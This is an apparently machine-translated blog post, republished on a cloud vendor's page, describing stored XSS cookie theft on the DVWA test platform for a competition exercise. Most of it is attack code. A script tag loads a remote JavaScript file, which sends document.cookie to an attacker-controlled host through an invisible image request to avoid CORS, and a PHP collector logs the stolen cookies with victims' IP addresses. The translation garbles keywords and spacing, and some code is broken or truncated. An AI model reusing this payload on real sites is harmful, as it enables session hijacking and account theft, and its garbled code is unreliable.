XSS Cookie Theft (DVAW platform test)

Source: Internet
Author: User

XSS Cookie Theft (DVAW platform test)

In the face of the competition, one question was to write a script to receive Cookies, so I simulated the XSS environment.

PS: WAF filtering is not considered.

First, the XSS is stored. Currently, the DVAW security level is low.

I haven't written a Web page for a long time-I forgot to write cross-origin code = xss in the first place.

First put a js file on the server, and xss loads it.

Loading xss is simple:

<script type="text/javascript" src="http://xxx.xxx.xxx.xx/getCookies.js"></script>
 

A piece of code that is easy to understand. js is introduced remotely. Creates a broken image and uses the error message mechanism to call the cccgood () function of js.

GetCookies. js:

Function cccgood () {// For ease of test without considering IE, friends are equipped with chromexican mlhttp = new XMLHttpRequest (); xmlhttp. open ("GET", "http://xxx.xxx.xxx.xxx/a.php? Ccc = "+ escape (document. cookie); xmlhttp. send ();}

Unfortunately-Origin null is not allowed by Access-Control-Allow-Origin.

0.0 .... So in another way, every src is a get ~~ Then, we can use an invisible img to go to src. Remote files are used to limit the number of words in Payload. Write as follows:

Function cccgood () {var img = document. createElement ("img"); img. src = "http://xxx.xxx.xxx.xxx/a.php? Ccc = "+ escape (document. cookie); document. body. appendChild ("img");} the escape () function can encode the string so that the string can be read on all computers. Prevent Cookies from carrying special characters.

In this way, cross-origin checks are successfully avoided.

Receive php code on a pay-as-you-go basis (provided by my friend @ Zero)

A. php

<?phpif(isset($_GET['ccc'])){if(!empty($_GET['ccc'])){$ccc = date("y-m-d h:i:s  ",time())." Cookies:".$_GET['ccc'];$user_IP = $_SERVER["REMOTE_ADDR"];$content="[".$user_IP."] ".$ccc;$fp=fopen("ccc.txt","a");fwrite($fp,$content."\r\n");fclose($fp);echo "Your Cookie :<br><br> $content<br><br><br>

 

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.